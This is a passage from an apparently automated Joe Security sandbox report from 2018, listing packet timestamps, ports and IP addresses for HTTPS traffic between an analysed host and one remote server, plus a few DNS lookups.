Mai 7, 2018 14:49:54.553488016 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.553513050 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.553527117 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.553539038 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.553553104 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.553566933 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.553756952 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.553781033 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.554011106 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.554476976 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.612673044 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.612704992 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.612716913 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.612725019 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.612735033 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.612741947 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.612776995 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.612792015 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.612803936 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.612817049 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.612828970 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.612880945 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.612925053 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.613523006 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.698668003 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.698709965 MESZ 443 49164 91.92.137.74 192.168.1.81
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2018 Page 44 of 149
Mai 7, 2018 14:49:54.698735952 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.698749065 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.698760986 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.698775053 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.698812962 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.698828936 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.698842049 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.698853970 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.698867083 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.699132919 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.699177980 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.699539900 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.699651003 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.810642004 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.810676098 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.810688019 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.810697079 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.810705900 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.810714006 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.810735941 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.810745001 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.810753107 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.810760021 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.810766935 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.811119080 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.811151028 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.811446905 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.811532974 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.923261881 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.923312902 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.923319101 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.923341990 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.923351049 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.923356056 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.923361063 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.923633099 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.923666000 MESZ 443 49164 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:54.924761057 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.925628901 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:54.925736904 MESZ 49164 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:57.409387112 MESZ 49912 53 192.168.1.81 8.8.8.8
Mai 7, 2018 14:49:57.457447052 MESZ 53 49912 8.8.8.8 192.168.1.81
Mai 7, 2018 14:49:57.499145985 MESZ 49165 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:57.499203920 MESZ 443 49165 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:57.499639034 MESZ 49165 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:57.620915890 MESZ 49165 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:57.620966911 MESZ 443 49165 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:58.977372885 MESZ 443 49165 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:58.977400064 MESZ 443 49165 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:58.977407932 MESZ 443 49165 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:58.977464914 MESZ 49165 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:58.980299950 MESZ 49165 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:58.981456995 MESZ 49165 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:58.981486082 MESZ 443 49165 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:58.982093096 MESZ 443 49165 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:58.982142925 MESZ 49165 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:59.590126991 MESZ 49165 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:59.604815960 MESZ 62993 53 192.168.1.81 8.8.8.8
Mai 7, 2018 14:49:59.627000093 MESZ 443 49165 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:59.656533003 MESZ 53 62993 8.8.8.8 192.168.1.81
Mai 7, 2018 14:49:59.668673992 MESZ 58780 53 192.168.1.81 8.8.8.8
Mai 7, 2018 14:49:59.710364103 MESZ 53 58780 8.8.8.8 192.168.1.81
Mai 7, 2018 14:49:59.958909035 MESZ 443 49165 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:59.959080935 MESZ 49165 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:59.959119081 MESZ 443 49165 91.92.137.74 192.168.1.81
Mai 7, 2018 14:49:59.959759951 MESZ 49165 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:59.959785938 MESZ 443 49165 91.92.137.74 192.168.1.81
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2018 Page 45 of 149
Mai 7, 2018 14:49:59.960217953 MESZ 49165 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:59.960324049 MESZ 49165 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:49:59.960412025 MESZ 49165 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:00.029758930 MESZ 49167 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:00.029823065 MESZ 443 49167 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:00.029896021 MESZ 49167 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:00.031297922 MESZ 49167 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:00.031328917 MESZ 443 49167 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:01.060087919 MESZ 443 49167 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:01.060348988 MESZ 49167 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:01.085767984 MESZ 49167 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:01.085812092 MESZ 443 49167 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:01.091932058 MESZ 49167 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:01.091974020 MESZ 443 49167 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:01.725267887 MESZ 443 49167 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:01.725388050 MESZ 49167 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:01.725414991 MESZ 443 49167 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:01.725586891 MESZ 49167 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:01.725610018 MESZ 443 49167 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:01.726214886 MESZ 49167 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:01.726706982 MESZ 49167 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:01.726780891 MESZ 443 49167 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:01.726878881 MESZ 49167 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:18.129126072 MESZ 49168 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:18.129182100 MESZ 443 49168 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:18.129264116 MESZ 49168 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:18.130630016 MESZ 49168 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:18.130669117 MESZ 443 49168 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:18.660918951 MESZ 443 49168 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:18.662002087 MESZ 49168 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:18.699434042 MESZ 49168 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:18.699459076 MESZ 443 49168 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:18.826329947 MESZ 49168 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:18.826387882 MESZ 443 49168 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:19.132747889 MESZ 443 49168 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:19.132867098 MESZ 49168 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:19.132888079 MESZ 443 49168 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:19.132999897 MESZ 49168 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:19.133410931 MESZ 49168 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:19.134037018 MESZ 443 49168 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:19.136897087 MESZ 49168 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:20.125428915 MESZ 49169 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:20.125485897 MESZ 443 49169 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:20.125617981 MESZ 49169 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:20.127439022 MESZ 49169 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:20.127468109 MESZ 443 49169 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:20.630429029 MESZ 443 49169 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:20.630625963 MESZ 49169 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:20.681183100 MESZ 49169 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:20.681217909 MESZ 443 49169 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:20.687788010 MESZ 49169 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:20.687833071 MESZ 443 49169 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:20.956351995 MESZ 54934 53 192.168.1.81 8.8.8.8
Mai 7, 2018 14:50:20.987132072 MESZ 443 49169 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:20.987380981 MESZ 49169 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:20.987426043 MESZ 443 49169 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:20.992855072 MESZ 49169 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:21.010361910 MESZ 49169 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:21.010529995 MESZ 443 49169 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:21.011044025 MESZ 49169 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:21.265947104 MESZ 49170 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:21.265994072 MESZ 443 49170 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:21.266061068 MESZ 49170 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:21.267222881 MESZ 49170 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:21.267246962 MESZ 443 49170 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:21.522135973 MESZ 53 54934 8.8.8.8 192.168.1.81
Mai 7, 2018 14:50:21.526216030 MESZ 62845 53 192.168.1.81 8.8.8.8
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2018 Page 46 of 149
Mai 7, 2018 14:50:21.625046015 MESZ 53 62845 8.8.8.8 192.168.1.81
Mai 7, 2018 14:50:21.959645987 MESZ 443 49170 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:21.959753036 MESZ 49170 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:22.248624086 MESZ 49170 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:22.248667002 MESZ 443 49170 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:22.254482985 MESZ 49170 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:22.254513025 MESZ 443 49170 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:22.511234999 MESZ 443 49170 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:22.511528969 MESZ 49170 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:22.511599064 MESZ 443 49170 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:22.511677027 MESZ 49170 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:22.511989117 MESZ 49170 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:22.512729883 MESZ 443 49170 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:22.512835026 MESZ 49170 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:22.631843090 MESZ 49172 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:22.631901026 MESZ 443 49172 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:22.632128954 MESZ 49172 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:22.637629986 MESZ 49172 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:22.637665987 MESZ 443 49172 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:23.138309956 MESZ 443 49172 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:23.138420105 MESZ 49172 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:23.787291050 MESZ 49172 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:23.787319899 MESZ 443 49172 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:24.865243912 MESZ 49172 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:24.865273952 MESZ 443 49172 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:25.183897018 MESZ 443 49172 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:25.184053898 MESZ 49172 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:25.184122086 MESZ 443 49172 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:25.184227943 MESZ 49172 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:25.184540987 MESZ 49172 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:25.185210943 MESZ 443 49172 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:25.185322046 MESZ 49172 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:25.303251028 MESZ 49173 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:25.303307056 MESZ 443 49173 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:25.303683043 MESZ 49173 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:25.304938078 MESZ 49173 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:25.304969072 MESZ 443 49173 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:25.906641006 MESZ 443 49173 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:25.906786919 MESZ 49173 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:25.916754007 MESZ 49173 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:25.916796923 MESZ 443 49173 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:25.922651052 MESZ 49173 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:25.922679901 MESZ 443 49173 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:26.280219078 MESZ 443 49173 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:26.280395031 MESZ 49173 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:26.280424118 MESZ 443 49173 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:26.283083916 MESZ 49173 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:26.283109903 MESZ 443 49173 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:26.284081936 MESZ 49173 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:26.309689045 MESZ 49173 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:26.309916973 MESZ 443 49173 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:26.310038090 MESZ 49173 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:26.429156065 MESZ 49174 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:26.429222107 MESZ 443 49174 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:26.429315090 MESZ 49174 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:26.430871010 MESZ 49174 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:26.430896044 MESZ 443 49174 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:26.932140112 MESZ 443 49174 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:26.933259964 MESZ 49174 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:26.971972942 MESZ 49174 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:26.972002983 MESZ 443 49174 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:26.982112885 MESZ 49174 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:26.982146978 MESZ 443 49174 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:27.343884945 MESZ 443 49174 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:27.345050097 MESZ 49174 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:27.345077991 MESZ 443 49174 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:27.346410036 MESZ 49174 443 192.168.1.81 91.92.137.74
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2018 Page 47 of 149
Mai 7, 2018 14:50:27.346676111 MESZ 49174 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:27.346770048 MESZ 443 49174 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:27.352819920 MESZ 49174 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:27.574843884 MESZ 49175 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:27.574908972 MESZ 443 49175 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:27.575330019 MESZ 49175 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:27.576484919 MESZ 49175 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:27.576508999 MESZ 443 49175 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:28.308366060 MESZ 443 49175 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:28.308540106 MESZ 49175 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:28.629034996 MESZ 49175 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:28.629090071 MESZ 443 49175 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:28.638390064 MESZ 49175 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:28.638418913 MESZ 443 49175 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:28.874737978 MESZ 443 49175 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:28.875103951 MESZ 49175 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:28.875150919 MESZ 443 49175 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:28.875869989 MESZ 49175 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:28.876287937 MESZ 49175 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:28.876385927 MESZ 443 49175 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:28.876482964 MESZ 49175 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:28.993490934 MESZ 49176 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:28.993551970 MESZ 443 49176 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:28.993643999 MESZ 49176 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:28.995147943 MESZ 49176 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:28.995174885 MESZ 443 49176 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:29.783293962 MESZ 443 49176 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:29.783453941 MESZ 49176 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:30.258991957 MESZ 49176 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:30.259026051 MESZ 443 49176 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:30.267086029 MESZ 49176 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:30.267118931 MESZ 443 49176 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:30.494457006 MESZ 443 49176 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:30.494595051 MESZ 49176 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:30.494617939 MESZ 443 49176 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:30.496949911 MESZ 49176 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:30.496969938 MESZ 443 49176 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:30.497054100 MESZ 49176 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:30.497248888 MESZ 49176 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:30.497328043 MESZ 443 49176 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:30.497330904 MESZ 49176 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:30.497392893 MESZ 49176 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:30.613559961 MESZ 49177 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:30.613604069 MESZ 443 49177 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:30.613836050 MESZ 49177 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:30.615142107 MESZ 49177 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:30.615169048 MESZ 443 49177 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:31.155294895 MESZ 443 49177 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:31.155441046 MESZ 49177 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:32.049947977 MESZ 49177 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:32.049983978 MESZ 443 49177 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:32.056523085 MESZ 49177 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:32.056551933 MESZ 443 49177 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:32.423326015 MESZ 443 49177 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:32.423460007 MESZ 49177 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:32.423501968 MESZ 443 49177 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:32.423994064 MESZ 49177 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:32.424221992 MESZ 49177 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:32.424592018 MESZ 443 49177 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:32.427001953 MESZ 49177 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:32.551448107 MESZ 49178 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:32.551506042 MESZ 443 49178 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:32.551575899 MESZ 49178 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:32.552609921 MESZ 49178 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:32.552643061 MESZ 443 49178 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:33.204575062 MESZ 443 49178 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:33.205807924 MESZ 49178 443 192.168.1.81 91.92.137.74
Timestamp Source Port Dest Port Source IP Dest IP
Copyright Joe Security LLC 2018 Page 48 of 149
Mai 7, 2018 14:50:33.247412920 MESZ 49178 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:33.247442007 MESZ 443 49178 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:33.253530025 MESZ 49178 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:33.253554106 MESZ 443 49178 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:33.667110920 MESZ 443 49178 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:33.667279959 MESZ 49178 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:33.667299986 MESZ 443 49178 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:33.671252966 MESZ 49178 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:33.942887068 MESZ 49178 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:33.943125963 MESZ 443 49178 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:33.943236113 MESZ 49178 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:34.109277964 MESZ 49179 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:34.109327078 MESZ 443 49179 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:34.109388113 MESZ 49179 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:34.110445023 MESZ 49179 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:34.110465050 MESZ 443 49179 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:34.728581905 MESZ 443 49179 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:34.728786945 MESZ 49179 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:34.739916086 MESZ 49179 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:34.739959955 MESZ 443 49179 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:34.979110003 MESZ 49179 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:34.979147911 MESZ 443 49179 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:35.242108107 MESZ 443 49179 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:35.242212057 MESZ 49179 443 192.168.1.81 91.92.137.74
Mai 7, 2018 14:50:35.242244005 MESZ 443 49179 91.92.137.74 192.168.1.81
Mai 7, 2018 14:50:35.242779016 MESZ 49179 443 192.168.1.81 91.92.137.74
